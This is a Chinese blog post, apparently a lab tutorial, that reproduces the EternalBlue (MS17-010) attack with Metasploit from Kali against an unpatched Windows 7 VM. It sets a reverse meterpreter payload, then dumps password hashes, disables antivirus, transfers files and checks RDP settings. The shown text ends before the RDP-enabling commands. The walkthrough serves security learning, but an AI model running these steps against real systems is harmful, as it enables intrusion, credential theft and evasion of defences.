<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.0.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" integrity="sha256-yIDrPSXHZdOZhAqiBP7CKzIwMQmRCJ8UeB8Jo17YC4o=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.19.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前提有 cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso 镜像文件，并且创建了虚拟机win7，并且开启桥接模式或NAT模式，建议开桥接模式 有 kali-linux-2023-W10-vmware-amd64.vmwarevm.zip 文件，解压并且添加到虚拟机上，开启桥接模式或NAT模式，建议开桥接模式  这次是kali攻击win7。攻击机-">
<meta property="og:type" content="article">
<meta property="og:title" content="永恒之蓝">
<meta property="og:url" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前提有 cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso 镜像文件，并且创建了虚拟机win7，并且开启桥接模式或NAT模式，建议开桥接模式 有 kali-linux-2023-W10-vmware-amd64.vmwarevm.zip 文件，解压并且添加到虚拟机上，开启桥接模式或NAT模式，建议开桥接模式  这次是kali攻击win7。攻击机-">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_29_15_851.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_37_16_9.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_37_47_308.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_39_11_253.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_43_11_641.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_01_16_681.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_03_38_619.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_23_59_530.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_31_37_231.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_08_45_744.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_09_06_742.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_48_02_332.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_19_20_26_531.png">
<meta property="og:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_19_23_41_768.png">
<meta property="article:published_time" content="2023-11-11T11:23:25.000Z">
<meta property="article:modified_time" content="2023-12-10T01:25:44.590Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="网络">
<meta property="article:tag" content="漏洞">
<meta property="article:tag" content="永恒之蓝">
<meta property="article:tag" content="MSF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_29_15_851.png">


<link rel="canonical" href="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/","path":"2023/11/11/永恒之蓝/","title":"永恒之蓝"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>永恒之蓝 | Hexo</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Hexo</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E6%8F%90"><span class="nav-number">1.</span> <span class="nav-text">前提</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MSF"><span class="nav-number">2.</span> <span class="nav-text">MSF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0%EF%BC%9A"><span class="nav-number">3.1.</span> <span class="nav-text">1、主机发现：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E4%BD%BF%E7%94%A8-MSF-%E7%9A%84%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E6%A8%A1%E5%9D%97"><span class="nav-number">3.2.</span> <span class="nav-text">2、使用 MSF 的永恒之蓝漏洞模块</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81%E4%BD%BF%E7%94%A8ms17-010%E6%89%AB%E6%8F%8F%E6%A8%A1%E5%9D%97%EF%BC%8C%E5%AF%B9%E9%9D%B6%E6%9C%BA%E8%BF%9B%E8%A1%8C%E6%89%AB%E6%8F%8F%EF%BC%9A"><span class="nav-number">3.3.</span> <span class="nav-text">3、使用ms17-010扫描模块，对靶机进行扫描：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%E3%80%81%E4%BD%BF%E7%94%A8ms17-010%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9D%97%EF%BC%8C%E5%AF%B9%E9%9D%B6%E6%9C%BA%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB"><span class="nav-number">3.4.</span> <span class="nav-text">4、使用ms17-010攻击模块，对靶机进行攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%E3%80%81%E6%9F%A5%E8%AF%A2%E4%BF%A1%E6%81%AF"><span class="nav-number">3.5.</span> <span class="nav-text">5、查询信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6%E3%80%81%E4%B8%8A%E4%BC%A0%E3%80%81%E4%B8%8B%E8%BD%BD%E3%80%81%E5%BF%AB%E7%85%A7"><span class="nav-number">3.6.</span> <span class="nav-text">6、上传、下载、快照</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7%E3%80%81%E5%BE%97%E5%88%B0%E9%9D%B6%E6%9C%BAshell"><span class="nav-number">3.7.</span> <span class="nav-text">7、得到靶机shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8%E3%80%81%E6%8C%82%E5%90%8E%E5%8F%B0"><span class="nav-number">3.8.</span> <span class="nav-text">8、挂后台</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9%E3%80%81%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%89%93%E5%BC%803389%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6%8E%A5%E7%AB%AF%E5%8F%A3"><span class="nav-number">3.9.</span> <span class="nav-text">9、命令行打开3389远程连接端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10%E3%80%81%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%B7%BB%E5%8A%A0%E7%99%BB%E5%BD%95%E7%94%A8%E6%88%B7"><span class="nav-number">3.10.</span> <span class="nav-text">10、命令行添加登录用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11%E3%80%81%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95"><span class="nav-number">3.11.</span> <span class="nav-text">11、远程登录</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E8%A7%A3%E5%86%B3%E5%8A%9E%E6%B3%95"><span class="nav-number">4.</span> <span class="nav-text">永恒之蓝漏洞解决办法</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="永恒之蓝 | Hexo">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          永恒之蓝
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2023-11-11 19:23:25" itemprop="dateCreated datePublished" datetime="2023-11-11T19:23:25+08:00">2023-11-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2023-12-10 09:25:44" itemprop="dateModified" datetime="2023-12-10T09:25:44+08:00">2023-12-10</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="前提"><a href="#前提" class="headerlink" title="前提"></a>前提</h2><p>有 <code>cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso</code> 镜像文件，并且创建了虚拟机win7，并且开启桥接模式或NAT模式，建议开桥接模式</p>
<p>有 <code>kali-linux-2023-W10-vmware-amd64.vmwarevm.zip</code> 文件，解压并且添加到虚拟机上，开启桥接模式或NAT模式，建议开桥接模式</p>
<blockquote>
<p>这次是kali攻击win7。攻击机-kali：192.168.0.65。靶机-win7：192.168.0.64</p>
<p>两台机子可以相互ping通，并且靶机（无补丁）开启了445端口，防火墙是关闭的！</p>
</blockquote>
<p>对win7的cmd <code>ipconfig</code> 一下，对kali的终端 <code>ifconfig</code> 一下，使得二者可以相互 <code>ping</code> 通</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">win7:ping 192.168.0.65</span><br><span class="line">//kali:ping 192.168.0.64       #kali是Linux，使用 ping 命令会一直 ping 下去，所以需要使用下面的命令</span><br><span class="line">kali:ping -c 4 192.168.0.64    #4是ping的次数</span><br></pre></td></tr></table></figure>

<p>如果在kali上不小心使用了 <code>ping</code> 命令，使用 <code>Ctrl</code> + <code>C</code> 中断。</p>
<p>如果不放心可以查看进程 <code>ps</code>，再去查查PID和怎么杀死进程。</p>
<h2 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h2><blockquote>
<p>参考：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/235631">MSF使用详解</a></p>
</blockquote>
<p>Metasploit</p>
<p>Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。</p>
<p>Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。</p>
<p>MSF的更新：<code>msfupdate</code></p>
<p>Metasploit的安装和升级</p>
<blockquote>
<p>注意：在一般的linux中，默认是不安装MSF的。以下是在非kali的Linux下安装MSF框架</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; msfinstall &amp;&amp; chmod 755 msfinstall &amp;&amp; ./msfinstall   </span><br><span class="line">adduser msf           #添加msf用户</span><br><span class="line">su msf                #切换到msf用户</span><br><span class="line">cd  /opt/metasploit-framework/bin   #切换到msf所在的目录 </span><br><span class="line">./msfconsole          #以后启动msfconsole，都切换到msf用户下启动，这样会同步数据库。如果使用root用户启动的话，不会同步数据库  </span><br><span class="line"></span><br><span class="line">也可以将msfconsole加入到执行目录下，这样在任何目录直接msfconsole就可以了</span><br><span class="line">ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole</span><br><span class="line"></span><br><span class="line">#备注：</span><br><span class="line">#初次运行msf会创建数据库，但是msf默认使用的PostgreSQL数据库不能与root用户关联，这也这也就是需要新建用户msf来运行metasploit的原因所在。如果你一不小心手一抖，初次运行是在root用户下，请使用 msfdb reinit 命令，然后使用非root用户初始化数据库。        </span><br><span class="line"></span><br><span class="line">MSF后期的升级：msfupdate</span><br></pre></td></tr></table></figure>



<p>MSF使用方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfconsole											进入框架</span><br><span class="line">search ms17-010										使用search命令查找相关漏洞</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue		使用use进入模块</span><br><span class="line">info												使用info查看模块信息</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp		设置攻击载荷</span><br><span class="line">show options										查看模块需要配置的参数</span><br><span class="line">set RHOST 192.168.125.138							设置参数</span><br><span class="line">exploit / run										攻击</span><br></pre></td></tr></table></figure>

<p>后渗透阶段</p>
<p>不同的攻击用到的步骤也不一样，这不是一成不变的，需要灵活使用。</p>
<p>我们也可以将攻击代码写入 configure.rc（只要是以 .rc 结尾的文件）配置文件中，然后使用命令msfconsole -r configure.rc 进行自动攻击！</p>
<p>MSF模块</p>
<p>漏洞利用(exploit)。exploit漏洞利用模块路径：&#x2F;usr&#x2F;share&#x2F;metasploit-framework&#x2F;modules&#x2F;exploits</p>
<p>攻击载荷(payload)。payload模块路径：&#x2F;usr&#x2F;share&#x2F;metasploit-framework&#x2F;modules&#x2F;payloads</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><blockquote>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43847838/article/details/121971441">渗透小技巧从getshell到3389端口远程桌面连接靶机</a></p>
</blockquote>
<h3 id="1、主机发现："><a href="#1、主机发现：" class="headerlink" title="1、主机发现："></a>1、主机发现：</h3><p>登录 kali linux，用 nmap 探测本网段存活主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.0.64/24</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_29_15_851.png"></p>
<p>可以看到，靶机的445端口是开放的，而永恒之蓝利用的就是445端口的SMB服务，操作系统溢出漏洞。</p>
<h3 id="2、使用-MSF-的永恒之蓝漏洞模块"><a href="#2、使用-MSF-的永恒之蓝漏洞模块" class="headerlink" title="2、使用 MSF 的永恒之蓝漏洞模块"></a>2、使用 MSF 的永恒之蓝漏洞模块</h3><p>打开MSF：（MSF每次打开都会有一个随机的界面，花里胡哨的）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_37_16_9.png"></p>
<blockquote>
<p>如果想要看其它界面可以输入 <code>banner</code> 查看</p>
</blockquote>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_37_47_308.png"></p>
<p>搜索 ms17-010 代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search ms17_010</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_39_11_253.png"></p>
<p>一般会有4个结果</p>
<p>这里可以得到一些工具，其中 <code>auxiliary/scanner/smb/smb_ms17_010</code> 是永恒之蓝扫描模块， <code>exploit/windows/smb/ms17_010_eternalblue</code> 是永恒之蓝攻击模块。</p>
<p>一般配合使用，前者先扫描，若显示有漏洞，再进行攻击。</p>
<h3 id="3、使用ms17-010扫描模块，对靶机进行扫描："><a href="#3、使用ms17-010扫描模块，对靶机进行扫描：" class="headerlink" title="3、使用ms17-010扫描模块，对靶机进行扫描："></a>3、使用ms17-010扫描模块，对靶机进行扫描：</h3><p>使用模块 <code>use 3</code> ，可以使用 <code>show options</code> 命令查看这个模块需要配置的信息，Required的yes是必须要有的，所以要设置 <code>RHOSTS</code> ，也就是目标靶 <code>set rhosts 192.168.0.64 </code> 。然后扫描探索一下 <code>exploit </code>。这里有+号的就是可能存在漏洞的主机，这里有3个主机存在漏洞。</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_20_43_11_641.png"></p>
<p>如果出现 <code>Host is likely VULNERABLE to MS17-010!</code> 的情况，就说明存在漏洞。</p>
<h3 id="4、使用ms17-010攻击模块，对靶机进行攻击"><a href="#4、使用ms17-010攻击模块，对靶机进行攻击" class="headerlink" title="4、使用ms17-010攻击模块，对靶机进行攻击"></a>4、使用ms17-010攻击模块，对靶机进行攻击</h3><p>使用模块 <code>use 0</code> ，使用 <code>info</code> 命令查看这个漏洞的信息，使用命令 <code>show targets</code> 显示该攻击模块针对哪些特定操作系统版本、语言版本的系统。</p>
<p>然后可以使用 <code>show options</code> 命令查看这个模块需要配置的信息，Required的yes是必须要有的，所以要设置 <code>RHOSTS</code> ，也就是目标靶 <code>set rhosts 192.168.0.64 </code> 。然后执行攻击： <code>exploit</code> 或 <code>run</code> 。</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_01_16_681.png"></p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_03_38_619.png"></p>
<p>攻击完成！</p>
<h3 id="5、查询信息"><a href="#5、查询信息" class="headerlink" title="5、查询信息"></a>5、查询信息</h3><p>执行命令 <code>sysinfo</code> 显示靶机系统信息，执行命令 <code>getuid</code> ，执行 <code>hashdump</code> 查询靶机的登录用户名和密码</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_23_59_530.png"></p>
<p>这个密码是hash值，需要在md5解密网站进行解密，解密网站有 <a target="_blank" rel="noopener" href="https://www.cmd5.com/">md5在线解密破解,md5解密加密 (cmd5.com)</a> 、 <a target="_blank" rel="noopener" href="https://www.somd5.com/">MD5免费在线解密破解_MD5在线加密-SOMD5</a> </p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_31_37_231.png"></p>
<h3 id="6、上传、下载、快照"><a href="#6、上传、下载、快照" class="headerlink" title="6、上传、下载、快照"></a>6、上传、下载、快照</h3><p>拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件，通过命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run  killav</span><br></pre></td></tr></table></figure>



<p>获取目标主机的详细信息。使用命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run scraper</span><br></pre></td></tr></table></figure>



<p>kali上传文件到win7</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload /home/kali/666.jpg C:/windows/temp</span><br></pre></td></tr></table></figure>

<p><code>/home/kali/666.jpg</code> 是kali要上传的文件路径，<code>C:/windows/temp</code> 是win7要接收的目录路径</p>
<p>kali从win7下载文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">download C:/windows/temp/66.jpg /home/kali/</span><br></pre></td></tr></table></figure>

<p><code>C:/windows/temp/66.jp</code> 是kali要从win7下载的文件路径，<code>/home/kali/</code> 是kali要接收的目录路径</p>
<p>获取屏幕快照</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">screenshot</span><br></pre></td></tr></table></figure>



<p>开启摄像头、键盘监听。。。</p>
<h3 id="7、得到靶机shell"><a href="#7、得到靶机shell" class="headerlink" title="7、得到靶机shell"></a>7、得到靶机shell</h3><p>输入 <code>shell</code> 可进入靶机的命令提示符窗口，再输入 <code>ipconfig</code> 查看靶机的IP地址。（发现会乱码）</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_08_45_744.png"></p>
<p>输入：<code>chcp 65001</code> 可解决乱码问题。</p>
<blockquote>
<p>因为windows的代码页编号是936，而kali是Linux的，代码页编号是65001。</p>
</blockquote>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_13_21_09_06_742.png"></p>
<h3 id="8、挂后台"><a href="#8、挂后台" class="headerlink" title="8、挂后台"></a>8、挂后台</h3><p>我们要想从 meterpreter 退出到MSF框架，可以使用命令 <code>background</code> 将其挂起。</p>
<p>查看后台 <code>show sessions</code> ， 进入 <code>sessions 1</code>。</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_20_48_02_332.png"></p>
<h3 id="9、命令行打开3389远程连接端口"><a href="#9、命令行打开3389远程连接端口" class="headerlink" title="9、命令行打开3389远程连接端口"></a>9、命令行打开3389远程连接端口</h3><p>在命令行中，可以使用如下命令查看 Windows7 的桌面远程端口是否是 <code>3389</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">REG QUERY &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_19_20_26_531.png"></p>
<blockquote>
<p>执行命令后，本例中查看到 PortNumber 的 16 进制值 0xd3d （相当于 10 进制 3389 ）</p>
</blockquote>
<p>使用命令 来查看3389端口是否打开</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">netstat -a</span><br><span class="line">netstat -an | find &quot;3389&quot;</span><br><span class="line">netstat -an | findstr :3389</span><br></pre></td></tr></table></figure>



<p>没开，所以要开一下，首先要看看当前是什么权限，<code>whoami</code>，如果是普通用户权限可能不行，需要提权到system最高权限才行。</p>
<p><img src="/2023/11/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/oCam_2023_11_14_19_23_41_768.png"></p>
<p>windows打开3389远程连接的命令，任选其一：</p>
